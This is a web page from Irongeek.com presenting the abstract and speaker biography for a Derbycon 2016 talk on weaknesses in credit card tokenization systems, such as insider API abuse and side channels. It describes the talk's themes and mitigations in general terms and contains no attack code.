A Logo

Feel free to include my content in your page via my
RSS feed

Help Irongeek.com pay for
bandwidth and research equipment:

Subscribestar or Patreon

Search Irongeek.com:

Irongeek Button
Social-engineer-training Button

Help Irongeek.com pay for bandwidth and research equipment:


Breaking Credit Card Tokenization Without Cryptanalysis - Tim MalcomVetter Derbycon 2016 (Hacking Illustrated Series InfoSec Tutorial Videos)

Breaking Credit Card Tokenization Without Cryptanalysis
Tim MalcomVetter
Derbycon 2016

Credit Card Tokenization is a very popular antidote to costly and time-consuming PCI regulations, but are all implementations equally secure? Early studies on tokenization focused on the cryptanalysis of the token generation process, especially when early implementations sought to create 16 digit numeric tokens to satisfy constraints in legacy commerce systems. Fast forward to 2016, most of those problems do not exist today; however, anecdotes from consulting with Fortune 500s suggest other insecure properties not involving crypto can vary and emerge in tokenization systems. This talk will dig into several sanitized examples from consulting engagements which reduce ?PCI Compliant? Credit Card Tokenization from ?silver bullet? to ?speed bump? status when big-picture security controls are missing. Specifically: abusing separation of duties by rogue partial insiders via public APIs commonly found in e-commerce applications; discovery of accidental side channels of critical information flow, such as timing analysis or response differentiation, which can be abused to reveal full PANs (primary account numbers); whether DevOps cultures could promote rogue admins abusing tokenization presentation logic implemented in JavaScript; and for good measure: some common programming defects which at best render tokenization pointless, and at worst could allow for a breach. With each example, we?ll look at potential solutions.

Tim MalcomVetter (@malcomvetter) has fifteen years in defending, building, and breaking systems. Tim is the Director of the Red Team at the world?s largest commercial entity, Walmart (@WalmartLabs), where he is privileged to lead a team of very skilled Red Team engineers testing one of the largest environments in the world (over 130 million IP addresses, petabytes of Big Data, thousands of applications, and millions upon millions of internal and external users). Before that, Tim was a Principal Consultant in Optiv?s Software Security Group, their top offensive security blogger during his tenure, performing penetration tests and code reviews on web apps, web services, mobile apps, point of sale systems, proprietary TCP socket services, and even fuel pumps and car washes (yes, fuel pumps!). Before that, Tim led agile e-commerce dev teams, led PCI compliance projects at Level 1 merchants, and was a security generalist wearer-of-many-hats. Tim has presented in numerous venues, including Black Hat USA Tools Arsenal, BSides, ArchC0N, ShowMeCon, Secure World Expo, several developer conferences, and Tim also donates time to coach the Missouri S&T Collegiate Cyber-Defense Team. Tim has several security certifications, a masters in information assurance, and held a doctoral study fellowship at Missouri S&T.


Back to Derbycon 2016 video list

Printable version of this article

15 most recent posts on Irongeek.com:

If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.

Copyright 2020, IronGeek
Louisville / Kentuckiana Information Security Enthusiast